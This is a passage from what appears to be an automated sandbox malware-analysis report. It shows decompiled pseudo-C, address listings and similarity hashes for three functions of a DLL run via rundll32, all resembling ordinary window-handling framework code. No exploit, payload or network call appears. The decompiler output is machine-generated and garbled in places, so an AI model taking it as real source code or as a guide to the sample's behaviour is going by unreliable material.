                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1659193697-0
                                                                                                        • Opcode ID: 4816466610db15041bf4befe32784a95d468d38e88b602cc21c3e10d9757e4ee
                                                                                                        • Instruction ID: 4d95fcf8730b3881445e5824ed999bb7e88cf789480e7c8658fc30675fc16f96
                                                                                                        • Opcode Fuzzy Hash: 4816466610db15041bf4befe32784a95d468d38e88b602cc21c3e10d9757e4ee
                                                                                                        • Instruction Fuzzy Hash: 79414876900705DFD720DF68E88199AB7F8FF08311B508A2EE89BD7611E731E944CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10022F30, Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10022F30(void* __ebx, void* __ecx, void* __esi, void* __ebp, int _a4, intOrPtr _a8) {
				void* __edi;
				void* _t9;
				int _t12;
				void* _t14;
				void* _t15;
				int _t19;
				void* _t20;
				void* _t23;

				_t23 = __ebp;
				_t20 = __esi;
				_t17 = __ecx;
				_t14 = __ebx;
				_t19 = _a4;
				_t24 = _t19;
				if(_t19 == 0) {
					E1000836F(__ebx, __ecx, _t19, __esi, _t24);
				}
				_push(_t14);
				_push(_t20);
				_t15 = E1000E5E5(_t14, _t17, _t23, GetParent( *(_t19 + 0x20)));
				_t18 = _t15;
				if(E1002566C(_t15, 0x1005c558) == 0) {
					L9:
					_t9 = 0;
				} else {
					if(_a8 == 0) {
						while(1) {
							_t19 = E1000E5E5(_t15, _t18, _t23, GetParent( *(_t19 + 0x20)));
							__eflags = _t19;
							if(_t19 == 0) {
								break;
							}
							_t12 = IsIconic( *(_t19 + 0x20));
							__eflags = _t12;
							if(_t12 != 0) {
								goto L9;
							} else {
								continue;
							}
							goto L5;
						}
						goto L4;
					} else {
						L4:
						_t9 = _t15;
					}
				}
				L5:
				return _t9;
			}











                                                                                                        0x10022f30
                                                                                                        0x10022f30
                                                                                                        0x10022f30
                                                                                                        0x10022f30
                                                                                                        0x10022f31
                                                                                                        0x10022f35
                                                                                                        0x10022f37
                                                                                                        0x10022f39
                                                                                                        0x10022f39
                                                                                                        0x10022f3e
                                                                                                        0x10022f3f
                                                                                                        0x10022f51
                                                                                                        0x10022f58
                                                                                                        0x10022f61
                                                                                                        0x10022f92
                                                                                                        0x10022f92
                                                                                                        0x10022f63
                                                                                                        0x10022f68
                                                                                                        0x10022f7f
                                                                                                        0x10022f8a
                                                                                                        0x10022f8c
                                                                                                        0x10022f8e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10022f75
                                                                                                        0x10022f7b
                                                                                                        0x10022f7d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10022f7d
                                                                                                        0x00000000
                                                                                                        0x10022f6a
                                                                                                        0x10022f6a
                                                                                                        0x10022f6a
                                                                                                        0x10022f6a
                                                                                                        0x10022f68
                                                                                                        0x10022f6c
                                                                                                        0x10022f6f

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 10022F49
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • IsIconic.USER32 ref: 10022F75
                                                                                                        • GetParent.USER32(?), ref: 10022F82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Parent$Exception@8H_prolog3IconicThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 144390861-0
                                                                                                        • Opcode ID: d210d7f1a51b40b5cc29df3b79207927f6febed5ce85f2330f2acac0138b4f8d
                                                                                                        • Instruction ID: 2fb89b87b9060bf2a3fa0836399fa3e5e22fc1271db9f66f0674af366c504e6e
                                                                                                        • Opcode Fuzzy Hash: d210d7f1a51b40b5cc29df3b79207927f6febed5ce85f2330f2acac0138b4f8d
                                                                                                        • Instruction Fuzzy Hash: 5CF0B435204A127BE791DAB4ED44A1BAAB9FF902E5B810535F884A3124FF30ED50C751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000BD3C, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E1000BD3C(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000BBFB() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000BCF0( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x10098d14(_a4, _a8);
			}





                                                                                                        0x1000bd49
                                                                                                        0x1000bd5d
                                                                                                        0x1000bd71
                                                                                                        0x1000bd89
                                                                                                        0x1000bd73
                                                                                                        0x1000bd7a
                                                                                                        0x1000bd7a
                                                                                                        0x1000bd91
                                                                                                        0x00000000
                                                                                                        0x1000bd93
                                                                                                        0x00000000
                                                                                                        0x1000bd9a
                                                                                                        0x1000bd91
                                                                                                        0x00000000
                                                                                                        0x1000bd5f
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 74ad9e125bbab192a0475b4a339846f2d1bd3bbf5fb3d64e2e1c5f75bf2aa371
                                                                                                        • Instruction ID: e5f65d51c15a6ed25578a50b7076b6e8eaf12e5ef2ee155e80ac9edb6982d403
                                                                                                        • Opcode Fuzzy Hash: 74ad9e125bbab192a0475b4a339846f2d1bd3bbf5fb3d64e2e1c5f75bf2aa371
                                                                                                        • Instruction Fuzzy Hash: 4FF03735600919ABFF91DF61CC48AAEBBBAFF002D0B108022FC05A5068EB30DB519B52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100104FC, Relevance: 1.9, APIs: 1, Instructions: 445COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 37%
                                                                                                        			E100104FC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1003EE82(0x100538b8, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E1000FECB(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000E5E5(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E1000D051(_t225 - 0x14, _t222, 7);
								_t194 = 0x10097510 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E1000C64E();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E1000D080(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E1000C64E();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E1000D080(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10010A14))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10008F77(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E1000899B(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E1000D09A(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000E60C(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E1002A233(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E1000EED5(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000899B(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E10008FE9(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000E5E5(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E1002AF88(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10008F77(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E1002AF88(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E1002AF88(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000E5E5(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000E5E5(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000E5E5(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000E5E5(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E1000D080(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E1000D080(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E1000D080(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E1000FF41(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E1000D080(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E1003EF21(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

























                                                                                                        0x100104fc
                                                                                                        0x100104fc
                                                                                                        0x10010503
                                                                                                        0x10010508
                                                                                                        0x1001050c
                                                                                                        0x1001050f
                                                                                                        0x10010516
                                                                                                        0x1001051f
                                                                                                        0x10010522
                                                                                                        0x10010546
                                                                                                        0x10010549
                                                                                                        0x10010575
                                                                                                        0x10010578
                                                                                                        0x1001057b
                                                                                                        0x10010588
                                                                                                        0x10010588
                                                                                                        0x1001058d
                                                                                                        0x10010590
                                                                                                        0x100105a6
                                                                                                        0x100105a6
                                                                                                        0x100105a9
                                                                                                        0x100105ab
                                                                                                        0x100105fa
                                                                                                        0x100105fe
                                                                                                        0x1001060b
                                                                                                        0x10010614
                                                                                                        0x1001061f
                                                                                                        0x10010625
                                                                                                        0x10010627
                                                                                                        0x1001062a
                                                                                                        0x1001065a
                                                                                                        0x1001065a
                                                                                                        0x1001065d
                                                                                                        0x10010663
                                                                                                        0x10010665
                                                                                                        0x100106f4
                                                                                                        0x100106f4
                                                                                                        0x100106f7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001066d
                                                                                                        0x10010674
                                                                                                        0x10010676
                                                                                                        0x10010678
                                                                                                        0x100106bc
                                                                                                        0x100106c1
                                                                                                        0x100106df
                                                                                                        0x100106e4
                                                                                                        0x100106e6
                                                                                                        0x100106e8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100106ca
                                                                                                        0x100106cc
                                                                                                        0x100109dd
                                                                                                        0x100109e0
                                                                                                        0x100109e5
                                                                                                        0x100109e5
                                                                                                        0x100109e8
                                                                                                        0x100109e8
                                                                                                        0x100109e9
                                                                                                        0x100109ec
                                                                                                        0x100109ee
                                                                                                        0x100109f0
                                                                                                        0x100109f0
                                                                                                        0x00000000
                                                                                                        0x100109f0
                                                                                                        0x100106d2
                                                                                                        0x100106d4
                                                                                                        0x100106d6
                                                                                                        0x100106db
                                                                                                        0x100106db
                                                                                                        0x100106de
                                                                                                        0x100106de
                                                                                                        0x100106ea
                                                                                                        0x100106ed
                                                                                                        0x100106ef
                                                                                                        0x100106f1
                                                                                                        0x00000000
                                                                                                        0x100106f1
                                                                                                        0x1001067a
                                                                                                        0x1001067d
                                                                                                        0x10010680
                                                                                                        0x10010685
                                                                                                        0x10010687
                                                                                                        0x1001068a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001068f
                                                                                                        0x10010695
                                                                                                        0x1001069a
                                                                                                        0x100106a3
                                                                                                        0x100106a6
                                                                                                        0x100106a9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100106af
                                                                                                        0x00000000
                                                                                                        0x10010732
                                                                                                        0x1001073a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010744
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001075e
                                                                                                        0x10010760
                                                                                                        0x10010760
                                                                                                        0x10010763
                                                                                                        0x10010764
                                                                                                        0x10010767
                                                                                                        0x1001076b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001077a
                                                                                                        0x1001077e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010785
                                                                                                        0x1001073b
                                                                                                        0x1001073b
                                                                                                        0x1001073d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010788
                                                                                                        0x10010790
                                                                                                        0x10010793
                                                                                                        0x10010796
                                                                                                        0x1001079a
                                                                                                        0x1001079d
                                                                                                        0x100107a2
                                                                                                        0x100107a4
                                                                                                        0x100107a8
                                                                                                        0x100107ac
                                                                                                        0x100107af
                                                                                                        0x100107b4
                                                                                                        0x100107b6
                                                                                                        0x100107b8
                                                                                                        0x100107bb
                                                                                                        0x100107bd
                                                                                                        0x100107c2
                                                                                                        0x100107c5
                                                                                                        0x100107ca
                                                                                                        0x100107cc
                                                                                                        0x100107ce
                                                                                                        0x100107ce
                                                                                                        0x100107cc
                                                                                                        0x100107d1
                                                                                                        0x100107d1
                                                                                                        0x100107d4
                                                                                                        0x100107d5
                                                                                                        0x100107d6
                                                                                                        0x100107d9
                                                                                                        0x100107da
                                                                                                        0x100107dc
                                                                                                        0x100107de
                                                                                                        0x100107e2
                                                                                                        0x100107e6
                                                                                                        0x100107e9
                                                                                                        0x100107ec
                                                                                                        0x100107f0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100107f7
                                                                                                        0x100107ff
                                                                                                        0x10010802
                                                                                                        0x10010805
                                                                                                        0x10010808
                                                                                                        0x1001080b
                                                                                                        0x1001080c
                                                                                                        0x1001080e
                                                                                                        0x10010812
                                                                                                        0x10010814
                                                                                                        0x10010814
                                                                                                        0x10010814
                                                                                                        0x10010818
                                                                                                        0x1001081b
                                                                                                        0x1001081b
                                                                                                        0x1001081e
                                                                                                        0x10010822
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001082c
                                                                                                        0x1001082f
                                                                                                        0x1001082f
                                                                                                        0x10010832
                                                                                                        0x10010834
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010846
                                                                                                        0x10010849
                                                                                                        0x1001084a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010853
                                                                                                        0x10010859
                                                                                                        0x1001085a
                                                                                                        0x1001085d
                                                                                                        0x10010839
                                                                                                        0x10010839
                                                                                                        0x1001083a
                                                                                                        0x10010770
                                                                                                        0x10010770
                                                                                                        0x10010771
                                                                                                        0x10010773
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010960
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001086b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010862
                                                                                                        0x10010864
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010876
                                                                                                        0x10010879
                                                                                                        0x1001087a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010885
                                                                                                        0x10010888
                                                                                                        0x1001088b
                                                                                                        0x1001088c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010899
                                                                                                        0x1001089a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010758
                                                                                                        0x10010961
                                                                                                        0x10010961
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10010749
                                                                                                        0x1001074b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100108aa
                                                                                                        0x100108b1
                                                                                                        0x100108b2
                                                                                                        0x100108b4
